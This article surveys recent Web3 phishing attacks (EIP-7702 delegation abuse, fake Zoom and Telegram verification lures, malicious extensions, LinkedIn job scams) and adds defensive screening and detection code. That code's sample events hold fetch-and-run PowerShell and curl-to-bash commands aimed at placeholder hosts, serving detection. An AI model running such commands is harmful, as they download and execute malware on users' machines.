MetaMask, Zoom, Telegram: new phishing threats hit Web3 via EIP-7702 abuse, fake browser plugins, LinkedIn scams, deepfakes, and bots. Perfect systems are impossible, and technical vulnerabilities are inevitable. So, the primary vulnerability remains the human element, and the stronger software engineering becomes, the more frequently attackers turn to social engineering. Let’s take a look at the most illustrative cases in recent months.
Next-Generation Phishing: From Approvals to Delegation
The SlowMist report has proven to be extremely valuable in revealing the current state of security. In addition to the core figures, which are quite impressive, the report also highlighted several trends related to current threats. Notably, the most technically significant case involved the use of EIP-7702, and the loss amounted to $146,551. The group Inferno Drainer attacked a user on May 24, 2025, by setting up a delegation to the address 0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B, which was already present in MetaMask’s infrastructure as an EIP-7702 Delegator.
The delegation mechanism made it possible to call approve functions on behalf of the user without changing the EOA. The key problem was that the user granted permission not to a “malicious contract” but to a legitimate Delegator, which was then used to run the phishing logic. Most anti-phishing tools focus on blocking transfer calls but not approve calls, which is what allowed the protection to be bypassed.
SlowMist makes a rather fair observation regarding the risks of multi-chain delegation (chainId = 0), the potential for storage incompatibility during redelegation, and the need for permission validation via ecrecover in wallets compatible with EIP-4337.
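The gap SlowMist describes is easy to see in code: a screening layer that only looks at transfers never sees the approval, and an EIP-7702 authorization with chainId = 0 is valid on every chain at once. The following is an added illustrative example (not code from SlowMist, MetaMask or Inferno Drainer) of how a wallet-side check could treat approvals as the high-risk class and surface every delegation in a request. The transaction dict shape, the placeholder spender and delegate addresses, and the severity labels are assumptions made for the example; the four-byte selectors are the standard ERC-20/ERC-721 ones.

```python
# Added illustrative example; screens a wallet request by decoding approval
# calldata and inspecting an EIP-7702 authorization list. Not vendor code.

UNLIMITED = (1 << 256) - 1

# First four bytes of keccak256(signature): the standard token selectors.
APPROVAL_SELECTORS = {
    "095ea7b3": "approve(address,uint256)",
    "39509351": "increaseAllowance(address,uint256)",
    "a22cb465": "setApprovalForAll(address,bool)",
}
TRANSFER_SELECTORS = {
    "a9059cbb": "transfer(address,uint256)",
    "23b872dd": "transferFrom(address,address,uint256)",
}


def _strip(data):
    d = data.lower()
    return d[2:] if d.startswith("0x") else d


def _word(data_hex, i):
    """i-th 32-byte ABI word after the 4-byte selector, as an int."""
    start = 8 + 64 * i
    return int(data_hex[start:start + 64], 16)


def _addr(data_hex, i):
    """i-th ABI word interpreted as a right-aligned 20-byte address."""
    start = 8 + 64 * i
    return "0x" + data_hex[start + 24:start + 64]


def screen_calldata(data):
    """Return findings (strings) for a single call's calldata."""
    d = _strip(data)
    if len(d) < 8:
        return []
    sel = d[:8]
    if sel in APPROVAL_SELECTORS:
        sig = APPROVAL_SELECTORS[sel]
        if len(d) < 8 + 128:
            return [f"WARN: {sig} with truncated calldata"]
        spender = _addr(d, 0)
        if sel == "a22cb465":
            if _word(d, 1) != 0:
                return [f"HIGH: {sig} gives operator rights over all tokens to {spender}"]
            return [f"INFO: {sig} revokes operator {spender}"]
        amount = _word(d, 1)
        if amount == UNLIMITED:
            return [f"HIGH: {sig} grants an unlimited allowance to {spender}"]
        if amount > 0:
            return [f"MEDIUM: {sig} grants allowance {amount} to {spender}"]
        return [f"INFO: {sig} sets allowance to zero for {spender}"]
    if sel in TRANSFER_SELECTORS:
        return [f"INFO: {TRANSFER_SELECTORS[sel]} (direct transfer; the case most blockers already cover)"]
    return []


def screen_request(tx):
    """Screen a tx dict with 'data' and an optional EIP-7702 'authorizationList'.

    Every delegation is surfaced, whether or not the delegate is a known
    contract: in the case above the delegator itself was legitimate.
    """
    findings = screen_calldata(tx.get("data", "0x"))
    for auth in tx.get("authorizationList", []):
        delegate = auth["address"]
        if auth["chainId"] == 0:
            findings.append(f"HIGH: EIP-7702 delegation to {delegate} valid on every chain (chainId = 0)")
        else:
            findings.append(f"MEDIUM: EIP-7702 delegation to {delegate} on chain {auth['chainId']}")
    return findings


# Constructed sample: an unlimited approve to a placeholder spender, bundled with
# a cross-chain delegation to a placeholder delegate (neither address is real).
SPENDER = "0x" + "ab" * 20
DELEGATE = "0x" + "cd" * 20
SAMPLE_TX = {
    "to": "0x" + "ef" * 20,
    "data": "0x095ea7b3" + SPENDER[2:].rjust(64, "0") + "f" * 64,
    "authorizationList": [{"chainId": 0, "address": DELEGATE}],
}

if __name__ == "__main__":
    for finding in screen_request(SAMPLE_TX):
        print(finding)
```

The design point is that the check fires on what the call does (grant spending rights, install a delegate), not on who the counterparty is; a reputation list would have passed the legitimate Delegator in the SlowMist case.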
Deepfake and Social Engineering: Trust as a Weapon
Among the most illustrative social engineering cases was the attack on Mehdi Farooq from Hypersphere Ventures. The attacker, posing as “Alex Lin,” invited the victim to a Zoom meeting under the pretext of compliance. The victim downloaded a fake “updated” Zoom client, which activated a trojan and gave the attacker remote control over the device. As a result, all six crypto wallets were emptied within minutes. During the attack, the perpetrator continued chatting via Telegram, lowering the victim’s level of concern.
Also common are campaigns using deepfake videos of public figures – Lee Hsien Loong, Lawrence Wong, Elon Musk – to promote scam platforms via X and Telegram. The videos are distributed with comments disabled and links to investment platforms visually styled to appear official or affiliated with government structures. The report also notes the use of deepfake videos to bypass KYC on centralized exchanges: the videos are generated based on real user photos.
Telegram SafeGuard Scam: RAT via Clipboard
Another widely spread attack involves fake Safeguard bots on Telegram. The user would join a channel via a link from an “investor” or KOL, where they were prompted to verify via “Tap to verify.” After a fake verification failure, the bot suggested proceeding with manual verification. The user was instructed to open the “Run” dialog and paste the contents of the clipboard.
In reality, the clipboard already contained a PowerShell command that initiated the download of malware. Remcos RAT was installed, providing remote access to:
- seed phrases,
- Keychain and Chrome Local Storage,
- system passwords, and saved 2FA tokens.
The attack worked on both Windows and macOS using different versions of loaders, so the key recommendation here is to perform a full OS reinstall, reset all passwords, and replace all hot wallets.
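From the defender's side, the Run-dialog paste leaves a recognisable trace in process-creation telemetry: an interactive launcher (explorer.exe on Windows, a terminal on macOS) spawns a shell whose command line fetches remote content and executes it. The following is an added illustrative detection example, not code from the report or any EDR vendor. The event fields are modelled loosely on Sysmon Event ID 1 (parent image, image, command line), the sample events are constructed, the URLs use the reserved `.invalid` domain, and the parent-process names and scoring thresholds are assumptions for the example.

```python
# Added illustrative detection example over constructed process-creation events.

REMOTE_FETCH = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                "invoke-restmethod", "net.webclient", "curl ", "wget ")
EXECUTE = ("iex", "invoke-expression", "-encodedcommand", "-enc ",
           "| bash", "| sh", "| zsh")
EVASION = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile",
           "-ep bypass", "-executionpolicy bypass")
# Assumed launcher names: Win+R Run is a child of explorer.exe; macOS terminals.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "zsh"}


def _basename(path):
    return path.lower().replace("\\", "/").rsplit("/", 1)[-1]


def classify(event):
    """Return (is_alert, reasons) for one process-creation event."""
    cmd = event["cmdline"].lower()
    parent, image = _basename(event["parent"]), _basename(event["image"])
    interactive = image in SHELLS and parent in INTERACTIVE_PARENTS
    fetch = any(t in cmd for t in REMOTE_FETCH)
    execute = any(t in cmd for t in EXECUTE)
    evasion = any(t in cmd for t in EVASION)
    reasons = []
    if interactive:
        reasons.append(f"shell {image} spawned by interactive launcher {parent}")
    if fetch:
        reasons.append("command line fetches remote content")
    if execute:
        reasons.append("command line executes fetched or encoded content")
    if evasion:
        reasons.append("window-hiding / policy-bypass flags present")
    # A download cradle is the core signal; it becomes an alert when paired with
    # execution, evasion flags, or an interactive launcher (the paste pattern).
    return fetch and (execute or evasion or interactive), reasons


def detect(events):
    """Return [(event id, reasons)] for every event that classifies as an alert."""
    out = []
    for e in events:
        is_alert, reasons = classify(e)
        if is_alert:
            out.append((e["id"], reasons))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": "run-dialog-paste",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/loader')\""},
    {"id": "macos-terminal-curl",
     "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/bash",
     "cmdline": "bash -c \"curl -fsSL https://example.invalid/loader.sh | bash\""},
    {"id": "benign-run-dialog",
     "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -c Get-ChildItem C:\\Users"},
    {"id": "benign-build-agent",
     "parent": "C:\\build\\agent.exe",
     "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "cmdline": "pwsh -File deploy.ps1"},
    {"id": "scripted-download-no-exec",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "cmdline": "pwsh -c \"Invoke-WebRequest https://example.invalid/artifact.zip -OutFile a.zip\""},
]

if __name__ == "__main__":
    for event_id, reasons in detect(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

The last sample event downloads a file from a script without executing it: it yields a fetch reason but no alert, which is the kind of triage split that keeps a rule like this from drowning in build-pipeline noise. Because the report says the loaders differed per OS, the same logic is applied to the macOS terminal case rather than a Windows-only signature.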
Loader-Replacing Extensions: Osiris and SwitchyOmega
We’ve already covered the large-scale case of fake extensions for nearly every crypto wallet on Firefox, but there are still a couple more worth mentioning:
- Osiris – distributed as a Web3 security tool. It replaced .exe, .dmg, and .zip downloads from official websites (Zoom, Notion) with malicious files. The download interface still appeared “official,” while the replacement occurred via network interception rules loaded from a C2 server.
- SwitchyOmega – a popular proxy manager for Chrome. The developer received a fake email allegedly from Google and granted access to an OAuth application. The malicious version 24.10.4 was uploaded and automatically updated for over 2.6 million users within 31 hours. The malicious worker.js connected to a C2 server, loaded configuration data, and listened for events from content.js.
LinkedIn Phishing Against Developers
Attackers have also managed to turn LinkedIn into a weapon. They actively launched attacks disguised as recruitment for frontend developers in Web3 projects. The victim would receive detailed documentation, a Figma link, and a Bitbucket repository link containing the technical assignment.
The server.js file contained a horizontally scrollable line – a sign of an obfuscated payload. When run, the script connected to a C2 server, then downloaded and executed two files: .npl (persistence) and test.js (data exfiltration). This type of attack collects:
- SSH keys,
- Keychain (macOS),
- Web3 extension data (seed phrases, authorizations),
- and maintains a persistent connection to the C2 server via heartbeat requests.
How to Protect Against These Attacks
These types of attacks are evolving and becoming more sophisticated, while detecting them may remain impossible for quite some time. The unfortunate truth is that at least one victim must emerge before their experience becomes known, and others can avoid the same fate.
Nonetheless, it’s important to follow established security practices – starting with safe code and continuous audits for developers, as well as digital hygiene and a healthy degree of skepticism for users. It may seem obvious, but in reality, not everyone follows these practices due to production constraints or inattentive user behavior. Not neglecting them already creates a substantial barrier for attackers.
Also, always stay alert and stay tuned to keep up with the latest developments in crypto, blockchain, and DeFi!